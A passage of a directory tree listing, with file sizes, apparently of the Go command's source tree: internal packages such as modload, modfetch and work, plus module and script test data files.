│ │ │ │ │ │ ├── [1.4K] context.go
│ │ │ │ │ │ └── [ 28K] list.go
│ │ │ │ │ ├── [4.0K] load
│ │ │ │ │ │ ├── [2.5K] flag.go
│ │ │ │ │ │ ├── [ 374] path.go
│ │ │ │ │ │ ├── [106K] pkg.go
│ │ │ │ │ │ ├── [1.7K] search.go
│ │ │ │ │ │ └── [ 24K] test.go
│ │ │ │ │ ├── [4.0K] lockedfile
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ └── [4.0K] filelock
│ │ │ │ │ │ │ ├── [5.7K] filelock_fcntl.go
│ │ │ │ │ │ │ ├── [3.0K] filelock.go
│ │ │ │ │ │ │ ├── [ 618] filelock_other.go
│ │ │ │ │ │ │ ├── [ 596] filelock_plan9.go
│ │ │ │ │ │ │ ├── [ 875] filelock_unix.go
│ │ │ │ │ │ │ └── [1.5K] filelock_windows.go
│ │ │ │ │ │ ├── [1.7K] lockedfile_filelock.go
│ │ │ │ │ │ ├── [5.1K] lockedfile.go
│ │ │ │ │ │ ├── [2.5K] lockedfile_plan9.go
│ │ │ │ │ │ └── [2.3K] mutex.go
│ │ │ │ │ ├── [4.0K] modcmd
│ │ │ │ │ │ ├── [8.2K] download.go
│ │ │ │ │ │ ├── [ 15K] edit.go
│ │ │ │ │ │ ├── [1.8K] graph.go
│ │ │ │ │ │ ├── [1.4K] init.go
│ │ │ │ │ │ ├── [ 807] mod.go
│ │ │ │ │ │ ├── [4.2K] tidy.go
│ │ │ │ │ │ ├── [ 12K] vendor.go
│ │ │ │ │ │ ├── [3.3K] verify.go
│ │ │ │ │ │ └── [3.8K] why.go
│ │ │ │ │ ├── [4.0K] modconv
│ │ │ │ │ │ ├── [2.6K] convert.go
│ │ │ │ │ │ ├── [3.3K] dep.go
│ │ │ │ │ │ ├── [1.0K] glide.go
│ │ │ │ │ │ ├── [ 600] glock.go
│ │ │ │ │ │ ├── [ 703] godeps.go
│ │ │ │ │ │ ├── [ 652] modconv.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [2.4K] cockroach.glock
│ │ │ │ │ │ │ ├── [2.0K] cockroach.out
│ │ │ │ │ │ │ ├── [4.4K] dockermachine.godeps
│ │ │ │ │ │ │ ├── [2.5K] dockermachine.out
│ │ │ │ │ │ │ ├── [1.7K] dockerman.glide
│ │ │ │ │ │ │ ├── [1.0K] dockerman.out
│ │ │ │ │ │ │ ├── [ 330] govmomi.out
│ │ │ │ │ │ │ ├── [1.2K] govmomi.vmanifest
│ │ │ │ │ │ │ ├── [6.9K] juju.out
│ │ │ │ │ │ │ ├── [9.5K] juju.tsv
│ │ │ │ │ │ │ ├── [6.1K] moby.out
│ │ │ │ │ │ │ ├── [6.9K] moby.vconf
│ │ │ │ │ │ │ ├── [ 515] panicparse.out
│ │ │ │ │ │ │ ├── [ 644] panicparse.vyml
│ │ │ │ │ │ │ ├── [ 20K] prometheus.out
│ │ │ │ │ │ │ ├── [ 58K] prometheus.vjson
│ │ │ │ │ │ │ ├── [1.9K] traefik.dep
│ │ │ │ │ │ │ ├── [1.1K] traefik.out
│ │ │ │ │ │ │ ├── [1.6K] upspin.dep
│ │ │ │ │ │ │ └── [ 505] upspin.out
│ │ │ │ │ │ ├── [ 594] tsv.go
│ │ │ │ │ │ ├── [ 652] vconf.go
│ │ │ │ │ │ ├── [ 678] vjson.go
│ │ │ │ │ │ ├── [ 702] vmanifest.go
│ │ │ │ │ │ └── [1007] vyml.go
│ │ │ │ │ ├── [4.0K] modfetch
│ │ │ │ │ │ ├── [ 386] bootstrap.go
│ │ │ │ │ │ ├── [ 22K] cache.go
│ │ │ │ │ │ ├── [4.0K] codehost
│ │ │ │ │ │ │ ├── [8.8K] codehost.go
│ │ │ │ │ │ │ ├── [ 22K] git.go
│ │ │ │ │ │ │ ├── [2.8K] shell.go
│ │ │ │ │ │ │ ├── [4.2K] svn.go
│ │ │ │ │ │ │ └── [ 16K] vcs.go
│ │ │ │ │ │ ├── [ 35K] coderepo.go
│ │ │ │ │ │ ├── [ 27K] fetch.go
│ │ │ │ │ │ ├── [ 309] key.go
│ │ │ │ │ │ ├── [ 12K] proxy.go
│ │ │ │ │ │ ├── [ 14K] repo.go
│ │ │ │ │ │ ├── [7.9K] sumdb.go
│ │ │ │ │ │ └── [4.0K] zip_sum_test
│ │ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ │ └── [335K] zip_sums.csv
│ │ │ │ │ ├── [4.0K] modget
│ │ │ │ │ │ ├── [ 63K] get.go
│ │ │ │ │ │ └── [ 11K] query.go
│ │ │ │ │ ├── [4.0K] modinfo
│ │ │ │ │ │ └── [2.2K] info.go
│ │ │ │ │ ├── [4.0K] modload
│ │ │ │ │ │ ├── [ 11K] build.go
│ │ │ │ │ │ ├── [ 47K] buildlist.go
│ │ │ │ │ │ ├── [ 23K] edit.go
│ │ │ │ │ │ ├── [2.3K] help.go
│ │ │ │ │ │ ├── [ 25K] import.go
│ │ │ │ │ │ ├── [ 54K] init.go
│ │ │ │ │ │ ├── [7.1K] list.go
│ │ │ │ │ │ ├── [ 78K] load.go
│ │ │ │ │ │ ├── [ 26K] modfile.go
│ │ │ │ │ │ ├── [3.8K] mvs.go
│ │ │ │ │ │ ├── [ 39K] query.go
│ │ │ │ │ │ ├── [5.4K] search.go
│ │ │ │ │ │ ├── [ 791] stat_openfile.go
│ │ │ │ │ │ ├── [ 963] stat_unix.go
│ │ │ │ │ │ ├── [ 733] stat_windows.go
│ │ │ │ │ │ └── [7.6K] vendor.go
│ │ │ │ │ ├── [4.0K] mvs
│ │ │ │ │ │ ├── [3.0K] errors.go
│ │ │ │ │ │ ├── [6.3K] graph.go
│ │ │ │ │ │ └── [ 15K] mvs.go
│ │ │ │ │ ├── [4.0K] par
│ │ │ │ │ │ ├── [1.9K] queue.go
│ │ │ │ │ │ └── [4.9K] work.go
│ │ │ │ │ ├── [4.0K] robustio
│ │ │ │ │ │ ├── [ 466] robustio_darwin.go
│ │ │ │ │ │ ├── [2.5K] robustio_flaky.go
│ │ │ │ │ │ ├── [1.9K] robustio.go
│ │ │ │ │ │ ├── [ 516] robustio_other.go
│ │ │ │ │ │ └── [ 615] robustio_windows.go
│ │ │ │ │ ├── [4.0K] run
│ │ │ │ │ │ └── [6.7K] run.go
│ │ │ │ │ ├── [4.0K] search
│ │ │ │ │ │ └── [ 20K] search.go
│ │ │ │ │ ├── [4.0K] str
│ │ │ │ │ │ ├── [1.8K] path.go
│ │ │ │ │ │ └── [2.5K] str.go
│ │ │ │ │ ├── [4.0K] test
│ │ │ │ │ │ ├── [2.0K] cover.go
│ │ │ │ │ │ ├── [2.0K] flagdefs.go
│ │ │ │ │ │ ├── [2.0K] genflags.go
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ └── [4.0K] genflags
│ │ │ │ │ │ │ └── [1.8K] vetflag.go
│ │ │ │ │ │ ├── [ 14K] testflag.go
│ │ │ │ │ │ └── [ 63K] test.go
│ │ │ │ │ ├── [4.0K] tool
│ │ │ │ │ │ └── [3.6K] tool.go
│ │ │ │ │ ├── [4.0K] trace
│ │ │ │ │ │ └── [4.8K] trace.go
│ │ │ │ │ ├── [4.0K] vcs
│ │ │ │ │ │ ├── [2.6K] discovery.go
│ │ │ │ │ │ └── [ 45K] vcs.go
│ │ │ │ │ ├── [4.0K] version
│ │ │ │ │ │ └── [4.4K] version.go
│ │ │ │ │ ├── [4.0K] vet
│ │ │ │ │ │ ├── [5.1K] vetflag.go
│ │ │ │ │ │ └── [3.3K] vet.go
│ │ │ │ │ ├── [4.0K] web
│ │ │ │ │ │ ├── [6.7K] api.go
│ │ │ │ │ │ ├── [ 636] bootstrap.go
│ │ │ │ │ │ ├── [6.7K] http.go
│ │ │ │ │ │ ├── [2.0K] url.go
│ │ │ │ │ │ ├── [ 446] url_other.go
│ │ │ │ │ │ └── [1.5K] url_windows.go
│ │ │ │ │ ├── [4.0K] work
│ │ │ │ │ │ ├── [ 28K] action.go
│ │ │ │ │ │ ├── [ 30K] build.go
│ │ │ │ │ │ ├── [ 25K] buildid.go
│ │ │ │ │ │ ├── [101K] exec.go
│ │ │ │ │ │ ├── [ 18K] gccgo.go
│ │ │ │ │ │ ├── [ 23K] gc.go
│ │ │ │ │ │ ├── [8.4K] init.go
│ │ │ │ │ │ └── [8.6K] security.go
│ │ │ │ │ └── [4.0K] workcmd
│ │ │ │ │ ├── [8.9K] edit.go
│ │ │ │ │ ├── [1.2K] init.go
│ │ │ │ │ ├── [4.0K] sync.go
│ │ │ │ │ ├── [5.8K] use.go
│ │ │ │ │ └── [2.3K] work.go
│ │ │ │ ├── [6.0K] main.go
│ │ │ │ ├── [ 395] mkalldocs.sh
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [3.5K] addmod.go
│ │ │ │ ├── [4.0K] failssh
│ │ │ │ │ └── [ 17] ssh
│ │ │ │ ├── [ 12K] mod
│ │ │ │ │ ├── [ 244] example.com_ambiguous_a_b_v0.0.0-empty.txt
│ │ │ │ │ ├── [ 356] example.com_ambiguous_a_v1.0.0.txt
│ │ │ │ │ ├── [ 200] example.com_badchain_a_v1.0.0.txt
│ │ │ │ │ ├── [ 200] example.com_badchain_a_v1.1.0.txt
│ │ │ │ │ ├── [ 200] example.com_badchain_b_v1.0.0.txt
│ │ │ │ │ ├── [ 200] example.com_badchain_b_v1.1.0.txt
│ │ │ │ │ ├── [ 126] example.com_badchain_c_v1.0.0.txt
│ │ │ │ │ ├── [ 126] example.com_badchain_c_v1.1.0.txt
│ │ │ │ │ ├── [ 365] example.com_cmd_v1.0.0-exclude.txt
│ │ │ │ │ ├── [ 373] example.com_cmd_v1.0.0-newerself.txt
│ │ │ │ │ ├── [ 397] example.com_cmd_v1.0.0-replace.txt
│ │ │ │ │ ├── [ 476] example.com_cmd_v1.0.0.txt
│ │ │ │ │ ├── [ 381] example.com_cmd_v1.9.0.txt
│ │ │ │ │ ├── [ 160] example.com_deprecated_a_v1.0.0.txt
│ │ │ │ │ ├── [ 260] example.com_deprecated_a_v1.9.0.txt
│ │ │ │ │ ├── [ 160] example.com_deprecated_b_v1.0.0.txt
│ │ │ │ │ ├── [ 260] example.com_deprecated_b_v1.9.0.txt
│ │ │ │ │ ├── [ 287] example.com_dotgo.go_v1.0.0.txt
│ │ │ │ │ ├── [ 159] example.com_dotname_v1.0.0.txt
│ │ │ │ │ ├── [ 148] example.com_downgrade_v2.0.0.txt
│ │ │ │ │ ├── [ 228] example.com_downgrade_v2_v2.0.1.txt
│ │ │ │ │ ├── [ 291] example.com_fuzzfail_v0.1.0.txt
│ │ │ │ │ ├── [ 416] example.com_fuzzfail_v0.2.0.txt
│ │ │ │ │ ├── [ 212] example.com_incompatiblewithsub_v1.0.0.txt
│ │ │ │ │ ├── [ 225] example.com_incompatiblewithsub_v2.0.0+incompatible.txt
│ │ │ │ │ ├── [ 229] example.com_invalidpath_v1_v1.0.0.txt
│ │ │ │ │ ├── [ 170] example.com_join_subpkg_v1.0.0.txt
│ │ │ │ │ ├── [ 177] example.com_join_subpkg_v1.1.0.txt
│ │ │ │ │ ├── [ 137] example.com_join_v1.0.0.txt
│ │ │ │ │ ├── [ 170] example.com_join_v1.1.0.txt
│ │ │ │ │ ├── [ 475] example.com_latemigrate_v2_v2.0.0.txt
│ │ │ │ │ ├── [ 449] example.com_latemigrate_v2_v2.0.1.txt
│ │ │ │ │ ├── [ 265] example.com_missingpkg_v1.0.0.txt
│ │ │ │ │ ├── [ 156] example.com_missingpkg_v1.0.1-beta.txt
│ │ │ │ │ ├── [ 261] example.com_nest_sub_v1.0.0.txt
│ │ │ │ │ ├── [ 244] example.com_nest_v1.0.0.txt
│ │ │ │ │ ├── [ 244] example.com_nest_v1.1.0.txt
│ │ │ │ │ ├── [ 211] example.com_newcycle_a_v1.0.0.txt
│ │ │ │ │ ├── [ 201] example.com_newcycle_a_v1.0.1.txt
│ │ │ │ │ ├── [ 144] example.com_newcycle_b_v1.0.0.txt
│ │ │ │ │ ├── [ 136] example.com_noroot_v1.0.0.txt
│ │ │ │ │ ├── [ 136] example.com_noroot_v1.0.1.txt
│ │ │ │ │ ├── [ 233] example.com_notags_v0.0.0-20190507143103-cc8cbe209b64.txt
│ │ │ │ │ ├── [ 781] example.com_printversion_v0.1.0.txt
│ │ │ │ │ ├── [1001] example.com_printversion_v1.0.0.txt
│ │ │ │ │ ├── [ 340] example.com_pseudoupgrade_v0.0.0-20190430073000-30950c05d534.txt
│ │ │ │ │ ├── [ 238] example.com_pseudoupgrade_v0.1.0.txt
│ │ │ │ │ ├── [ 346] example.com_pseudoupgrade_v0.1.1-0.20190429073117-b5426c86b553.txt
│ │ │ │ │ ├── [ 217] example.com_quote_v1.5.2.txt
│ │ │ │ │ ├── [ 178] example.com_retract_ambiguous_nested_v1.9.0-bad.txt
│ │ │ │ │ ├── [ 220] example.com_retract_ambiguous_other_v1.0.0.txt
│ │ │ │ │ ├── [ 129] example.com_retract_ambiguous_v1.0.0.txt
│ │ │ │ │ ├── [ 342] example.com_retract_incompatible_v1.0.0.txt
│ │ │ │ │ ├── [ 226] example.com_retract_incompatible_v2.0.0+incompatible.txt
│ │ │ │ │ ├── [ 252] example.com_retract_missingmod_v1.0.0.txt
│ │ │ │ │ ├── [ 167] example.com_retract_missingmod_v1.9.0.txt
│ │ │ │ │ ├── [ 96] example.com_retract_rationale_v1.0.0-block.txt
│ │ │ │ │ ├── [ 107] example.com_retract_rationale_v1.0.0-blockwithcomment.txt
│ │ │ │ │ ├── [ 125] example.com_retract_rationale_v1.0.0-empty.txt
│ │ │ │ │ ├── [ 124] example.com_retract_rationale_v1.0.0-long.txt
│ │ │ │ │ ├── [ 130] example.com_retract_rationale_v1.0.0-multiline1.txt
│ │ │ │ │ ├── [ 130] example.com_retract_rationale_v1.0.0-multiline2.txt
│ │ │ │ │ ├── [ 96] example.com_retract_rationale_v1.0.0-order.txt
│ │ │ │ │ ├── [ 131] example.com_retract_rationale_v1.0.0-unprintable.txt
│ │ │ │ │ ├── [ 96] example.com_retract_rationale_v1.0.1-order.txt
│ │ │ │ │ ├── [1.2K] example.com_retract_rationale_v1.9.0.txt
│ │ │ │ │ ├── [ 374] example.com_retract_rename_v1.0.0-bad.txt
│ │ │ │ │ ├── [ 429] example.com_retract_rename_v1.9.0-new.txt
│ │ │ │ │ ├── [ 241] example.com_retract_self_all_v1.9.0.txt
│ │ │ │ │ ├── [ 365] example.com_retract_self_prerelease_v1.0.0.txt
│ │ │ │ │ ├── [ 411] example.com_retract_self_prerelease_v1.9.0.txt
│ │ │ │ │ ├── [ 369] example.com_retract_self_prerelease_v1.9.1-pre.txt
│ │ │ │ │ ├── [ 192] example.com_retract_self_prev_v1.0.0-bad.txt
│ │ │ │ │ ├── [ 218] example.com_retract_self_prev_v1.1.0.txt
│ │ │ │ │ ├── [ 351] example.com_retract_self_prev_v1.9.0.txt
│ │ │ │ │ ├── [ 568] example.com_retract_self_pseudo_v0.0.0-20200325131415-0123456789ab
│ │ │ │ │ ├── [ 196] example.com_retract_self_pseudo_v1.0.0-bad.txt
│ │ │ │ │ ├── [ 310] example.com_retract_self_pseudo_v1.9.0.txt
│ │ │ │ │ ├── [ 119] example.com_retract_v1.0.0-bad.txt
│ │ │ │ │ ├── [ 120] example.com_retract_v1.0.0-good.txt
│ │ │ │ │ ├── [ 122] example.com_retract_v1.0.0-unused.txt
│ │ │ │ │ ├── [ 171] example.com_retract_v1.1.0.txt
│ │ │ │ │ ├── [ 353] example.com_split-incompatible_subpkg_v0.1.0.txt
│ │ │ │ │ ├── [ 299] example.com_split-incompatible_v2.0.0+incompatible.txt
│ │ │ │ │ ├── [ 347] example.com_split-incompatible_v2.1.0-pre+incompatible.txt
│ │ │ │ │ ├── [ 230] example.com_split_subpkg_v1.1.0.txt
│ │ │ │ │ ├── [ 196] example.com_split_v1.0.0.txt
│ │ │ │ │ ├── [ 204] example.com_split_v1.1.0.txt
│ │ │ │ │ ├── [ 380] example.com_stack_v1.0.0.txt
│ │ │ │ │ ├── [ 380] example.com_stack_v1.0.1.txt
│ │ │ │ │ ├── [ 161] example.com_tools_v1.0.0.txt
│ │ │ │ │ ├── [ 232] example.com_undeprecated_v1.0.0.txt
│ │ │ │ │ ├── [ 230] example.com_undeprecated_v1.0.1.txt
│ │ │ │ │ ├── [ 280] example.com_usemissingpre_v1.0.0.txt
│ │ │ │ │ ├── [ 143] example.com_v1.0.0.txt
│ │ │ │ │ ├── [ 168] example.com_version_v1.0.0.txt
│ │ │ │ │ ├── [ 168] example.com_version_v1.0.1.txt
│ │ │ │ │ ├── [ 168] example.com_version_v1.1.0.txt
│ │ │ │ │ ├── [ 402] example.net_ambiguous_nested_v0.1.0.txt
│ │ │ │ │ ├── [ 395] example.net_ambiguous_v0.1.0.txt
│ │ │ │ │ ├── [ 402] example.net_ambiguous_v0.2.0.txt
│ │ │ │ │ ├── [ 347] example.net_pkgadded_v1.0.0.txt
│ │ │ │ │ ├── [ 387] example.net_pkgadded_v1.1.0.txt
│ │ │ │ │ ├── [ 384] example.net_pkgadded_v1.2.0.txt
│ │ │ │ │ ├── [ 259] github.com_dmitshur-test_modtest5_v0.0.0-20190619020302-197a620e0c9a.txt
│ │ │ │ │ ├── [ 275] github.com_dmitshur-test_modtest5_v0.5.0-alpha.0.20190619023908-3da23a9deb9e.txt
│ │ │ │ │ ├── [ 215] github.com_dmitshur-test_modtest5_v0.5.0-alpha.txt
│ │ │ │ │ ├── [ 363] golang.org_notx_useinternal_v0.1.0.txt
│ │ │ │ │ ├── [1.3K] golang.org_x_internal_v0.1.0.txt
│ │ │ │ │ ├── [1.2K] golang.org_x_text_v0.0.0-20170915032832-14c0d48ead0c.txt
│ │ │ │ │ ├── [1.1K] golang.org_x_text_v0.3.0.txt
│ │ │ │ │ ├── [ 356] golang.org_x_useinternal_v0.1.0.txt
│ │ │ │ │ ├── [ 158] gopkg.in_dummy.v2-unstable_v2.0.0.txt
│ │ │ │ │ ├── [1.5K] not-rsc.io_quote_v0.1.0-nomod.txt
│ │ │ │ │ ├── [ 251] patch.example.com_depofdirectpatch_v1.0.0.txt
│ │ │ │ │ ├── [ 251] patch.example.com_depofdirectpatch_v1.0.1.txt
│ │ │ │ │ ├── [ 336] patch.example.com_direct_v1.0.0.txt
│ │ │ │ │ ├── [ 533] patch.example.com_direct_v1.0.1.txt
│ │ │ │ │ ├── [ 336] patch.example.com_direct_v1.1.0.txt
│ │ │ │ │ ├── [ 209] patch.example.com_indirect_v1.0.0.txt
│ │ │ │ │ ├── [ 209] patch.example.com_indirect_v1.0.1.txt
│ │ │ │ │ ├── [ 209] patch.example.com_indirect_v1.1.0.txt
│ │ │ │ │ ├── [1.4K] README
│ │ │ │ │ ├── [ 264] rsc.io_badfile1_v1.0.0.txt
│ │ │ │ │ ├── [ 172] rsc.io_badfile2_v1.0.0.txt
│ │ │ │ │ ├── [ 167] rsc.io_badfile3_v1.0.0.txt
│ │ │ │ │ ├── [ 191] rsc.io_badfile4_v1.0.0.txt
│ │ │ │ │ ├── [ 200] rsc.io_badfile5_v1.0.0.txt
│ │ │ │ │ ├── [ 137] rsc.io_badmod_v1.0.0.txt
│ │ │ │ │ ├── [ 326] rsc.io_badsum_v1.0.0.txt
│ │ │ │ │ ├── [ 332] rsc.io_badsum_v1.0.1.txt
│ │ │ │ │ ├── [ 186] rsc.io_badzip_v1.0.0.txt
│ │ │ │ │ ├── [ 151] rsc.io_breaker_v1.0.0.txt
│ │ │ │ │ ├── [ 255] rsc.io_breaker_v2.0.0+incompatible.txt
│ │ │ │ │ ├── [ 255] rsc.io_breaker_v2.0.0.txt
│ │ │ │ │ ├── [ 399] rsc.io_!c!g!o_v1.0.0.txt
│ │ │ │ │ ├── [ 199] rsc.io_fortune_v1.0.0.txt
│ │ │ │ │ ├── [ 292] rsc.io_fortune_v2_v2.0.0.txt
│ │ │ │ │ ├── [1.6K] rsc.io_quote_v0.0.0-20180214005133-e7a685a342c0.txt
│ │ │ │ │ ├── [2.0K] rsc.io_quote_v0.0.0-20180214005840-23179ee8a569.txt
│ │ │ │ │ ├── [2.3K] rsc.io_quote_v0.0.0-20180628003336-dd9747d19b04.txt
│ │ │ │ │ ├── [2.0K] rsc.io_quote_v0.0.0-20180709153244-fd906ed3b100.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v0.0.0-20180709160352-0d003b9c4bfa.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v0.0.0-20180709162749-b44a0b17b2d1.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v0.0.0-20180709162816-fe488b867524.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v0.0.0-20180709162918-a91498bed0a7.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v0.0.0-20180710144737-5d9f230bcfba.txt
│ │ │ │ │ ├── [ 916] rsc.io_quote_v1.0.0.txt
│ │ │ │ │ ├── [1.2K] rsc.io_quote_v1.1.0.txt
│ │ │ │ │ ├── [1.6K] rsc.io_quote_v1.2.0.txt
│ │ │ │ │ ├── [1.5K] rsc.io_quote_v1.2.1.txt
│ │ │ │ │ ├── [1.8K] rsc.io_quote_v1.3.0.txt
│ │ │ │ │ ├── [1.9K] rsc.io_quote_v1.4.0.txt
│ │ │ │ │ ├── [1.9K] rsc.io_quote_v1.5.0.txt
│ │ │ │ │ ├── [2.0K] rsc.io_quote_v1.5.1.txt
│ │ │ │ │ ├── [1.8K] rsc.io_!q!u!o!t!e_v1.5.2.txt
│ │ │ │ │ ├── [2.2K] rsc.io_quote_v1.5.2.txt
│ │ │ │ │ ├── [2.3K] rsc.io_quote_v1.5.3-pre1.txt
│ │ │ │ │ ├── [1.8K] rsc.io_!q!u!o!t!e_v1.5.3-!p!r!e.txt
│ │ │ │ │ ├── [2.0K] rsc.io_quote_v2.0.0.txt
│ │ │ │ │ ├── [2.0K] rsc.io_quote_v2_v2.0.1.txt
│ │ │ │ │ ├── [1.1K] rsc.io_quote_v3_v3.0.0.txt
│ │ │ │ │ ├── [ 568] rsc.io_sampler_v1.0.0.txt
│ │ │ │ │ ├── [3.2K] rsc.io_sampler_v1.2.0.txt
│ │ │ │ │ ├── [3.1K] rsc.io_sampler_v1.2.1.txt
│ │ │ │ │ ├── [4.7K] rsc.io_sampler_v1.3.0.txt
│ │ │ │ │ ├── [4.7K] rsc.io_sampler_v1.3.1.txt
│ │ │ │ │ ├── [3.2K] rsc.io_sampler_v1.99.99.txt
│ │ │ │ │ └── [ 142] rsc.io_testonly_v1.0.0.txt
│ │ │ │ ├── [4.0K] modlegacy
│ │ │ │ │ └── [4.0K] src
│ │ │ │ │ ├── [4.0K] new
│ │ │ │ │ │ ├── [ 16] go.mod
│ │ │ │ │ │ ├── [ 34] new.go
│ │ │ │ │ │ ├── [4.0K] p1
│ │ │ │ │ │ │ └── [ 219] p1.go
│ │ │ │ │ │ ├── [4.0K] p2
│ │ │ │ │ │ │ └── [ 11] p2.go
│ │ │ │ │ │ └── [4.0K] sub
│ │ │ │ │ │ ├── [ 18] go.mod
│ │ │ │ │ │ ├── [4.0K] inner
│ │ │ │ │ │ │ ├── [ 21] go.mod
│ │ │ │ │ │ │ └── [4.0K] x
│ │ │ │ │ │ │ └── [ 10] x.go
│ │ │ │ │ │ └── [4.0K] x
│ │ │ │ │ │ └── [4.0K] v1
│ │ │ │ │ │ └── [4.0K] y
│ │ │ │ │ │ └── [ 10] y.go
│ │ │ │ │ └── [4.0K] old
│ │ │ │ │ ├── [4.0K] p1
│ │ │ │ │ │ └── [ 63] p1.go
│ │ │ │ │ └── [4.0K] p2
│ │ │ │ │ └── [ 11] p2.go
│ │ │ │ ├── [1.5K] savedir.go
│ │ │ │ ├── [ 36K] script
│ │ │ │ │ ├── [ 985] badgo.txt
│ │ │ │ │ ├── [ 958] bug.txt
│ │ │ │ │ ├── [1.3K] build_acl_windows.txt
│ │ │ │ │ ├── [ 191] build_arm.txt
│ │ │ │ │ ├── [2.3K] build_buildvcs_auto.txt
│ │ │ │ │ ├── [ 243] build_cache_arch_mode.txt
│ │ │ │ │ ├── [ 430] build_cache_compile.txt
│ │ │ │ │ ├── [ 965] build_cache_disabled.txt
│ │ │ │ │ ├── [ 859] build_cache_gomips.txt
│ │ │ │ │ ├── [ 644] build_cache_link.txt
│ │ │ │ │ ├── [2.0K] build_cache_output.txt
│ │ │ │ │ ├── [ 865] build_cache_trimpath.txt
│ │ │ │ │ ├── [1.8K] build_cd_gopath_different.txt
│ │ │ │ │ ├── [ 441] build_cgo_consistent_results.txt
│ │ │ │ │ ├── [ 265] build_concurrent_backend.txt
│ │ │ │ │ ├── [ 345] build_darwin_cc_arch.txt
│ │ │ │ │ ├── [ 268] build_dash_n_cgo.txt
│ │ │ │ │ ├── [ 154] build_dash_o_dev_null.txt
│ │ │ │ │ ├── [1.1K] build_dash_x.txt
│ │ │ │ │ ├── [ 551] build_exe.txt
│ │ │ │ │ ├── [ 361] build_gcflags_order.txt
│ │ │ │ │ ├── [ 527] build_gcflags.txt
│ │ │ │ │ ├── [ 855] build_gopath_order.txt
│ │ │ │ │ ├── [1.4K] build_GOTMPDIR.txt
│ │ │ │ │ ├── [ 477] build_i_deprecate.txt
│ │ │ │ │ ├── [ 486] build_ignore_leading_bom.txt
│ │ │ │ │ ├── [1.2K] build_import_comment.txt
│ │ │ │ │ ├── [ 314] build_import_cycle.txt
│ │ │ │ │ ├── [1.2K] build_internal.txt
│ │ │ │ │ ├── [1.1K] build_issue48319.txt
│ │ │ │ │ ├── [2.7K] build_issue6480.txt
│ │ │ │ │ ├── [1012] build_i.txt
│ │ │ │ │ ├── [ 332] build_link_x_import_path_escape.txt
│ │ │ │ │ ├── [ 699] build_multi_main.txt
│ │ │ │ │ ├── [ 223] build_n_cgo.txt
│ │ │ │ │ ├── [ 108] build_negative_p.txt
│ │ │ │ │ ├── [1.2K] build_nocache.txt
│ │ │ │ │ ├── [ 748] build_no_go.txt
│ │ │ │ │ ├── [1.8K] build_output.txt
│ │ │ │ │ ├── [7.6K] build_overlay.txt
│ │ │ │ │ ├── [ 426] build_patterns_outside_gopath.txt
│ │ │ │ │ ├── [ 255] build_plugin_non_main.txt
│ │ │ │ │ ├── [ 192] build_relative_pkgdir.txt
│ │ │ │ │ ├── [ 410] build_relative_tmpdir.txt
│ │ │ │ │ ├── [ 349] build_runtime_gcflags.txt
│ │ │ │ │ ├── [ 267] build_single_error.txt
│ │ │ │ │ ├── [ 460] build_tag_goexperiment.txt
│ │ │ │ │ ├── [ 161] build_tags_no_comma.txt
│ │ │ │ │ ├── [ 500] build_test_only.txt
│ │ │ │ │ ├── [3.6K] build_trimpath_cgo.txt
│ │ │ │ │ ├── [2.9K] build_trimpath_goroot.txt
│ │ │ │ │ ├── [4.8K] build_trimpath.txt
│ │ │ │ │ ├── [ 144] build_unsupported_goos.txt
│ │ │ │ │ ├── [ 703] build_vendor.txt
│ │ │ │ │ ├── [ 830] cache_unix.txt
│ │ │ │ │ ├── [ 712] cache_vet.txt
│ │ │ │ │ ├── [ 343] cgo_asm_error.txt
│ │ │ │ │ ├── [2.8K] cgo_bad_directives.txt
│ │ │ │ │ ├── [ 158] cgo_depends_on_syscall.txt
│ │ │ │ │ ├── [ 523] cgo_flag_contains_space.txt
│ │ │ │ │ ├── [1.2K] cgo_path_space_quote.txt
│ │ │ │ │ ├── [1.6K] cgo_path_space.txt
│ │ │ │ │ ├── [ 972] cgo_path.txt
│ │ │ │ │ ├── [1.2K] cgo_stale_precompiled.txt
│ │ │ │ │ ├── [ 898] cgo_stale.txt
│ │ │ │ │ ├── [ 441] cgo_syso_issue29253.txt
│ │ │ │ │ ├── [1.3K] clean_binary.txt
│ │ │ │ │ ├── [ 552] clean_cache_n.txt
│ │ │ │ │ ├── [ 585] clean_testcache.txt
│ │ │ │ │ ├── [ 470] cmd_import_error.txt
│ │ │ │ │ ├── [ 595] cover_asm.txt
│ │ │ │ │ ├── [ 316] cover_atomic_pkgall.txt
│ │ │ │ │ ├── [ 385] cover_blank_func_decl.txt
│ │ │ │ │ ├── [ 551] cover_cgo_extra_file.txt
│ │ │ │ │ ├── [ 575] cover_cgo_extra_test.txt
│ │ │ │ │ ├── [ 414] cover_cgo.txt
│ │ │ │ │ ├── [ 455] cover_cgo_xtest.txt
│ │ │ │ │ ├── [ 380] cover_dash_c.txt
│ │ │ │ │ ├── [ 541] cover_dep_loop.txt
│ │ │ │ │ ├── [ 370] cover_dot_import.txt
│ │ │ │ │ ├── [1.3K] cover_error.txt
│ │ │ │ │ ├── [ 523] cover_import_main_loop.txt
│ │ │ │ │ ├── [ 176] cover_mod_empty.txt
│ │ │ │ │ ├── [ 669] cover_modes.txt
│ │ │ │ │ ├── [ 674] cover_pattern.txt
│ │ │ │ │ ├── [ 870] cover_pkgall_imports.txt
│ │ │ │ │ ├── [ 883] cover_pkgall_multiple_mains.txt
│ │ │ │ │ ├── [ 305] cover_pkgall_runtime.txt
│ │ │ │ │ ├── [ 404] cover_runs.txt
│ │ │ │ │ ├── [ 789] cover_statements.txt
│ │ │ │ │ ├── [ 345] cover_sync_atomic_import.txt
│ │ │ │ │ ├── [ 391] cpu_profile_twice.txt
│ │ │ │ │ ├── [ 525] devnull.txt
│ │ │ │ │ ├── [1.2K] doc.txt
│ │ │ │ │ ├── [ 348] embed_fmt.txt
│ │ │ │ │ ├── [2.3K] embed.txt
│ │ │ │ │ ├── [ 536] env_cross_build.txt
│ │ │ │ │ ├── [ 421] env_exp.txt
│ │ │ │ │ ├── [ 553] env_unset.txt
│ │ │ │ │ ├── [5.3K] env_write.txt
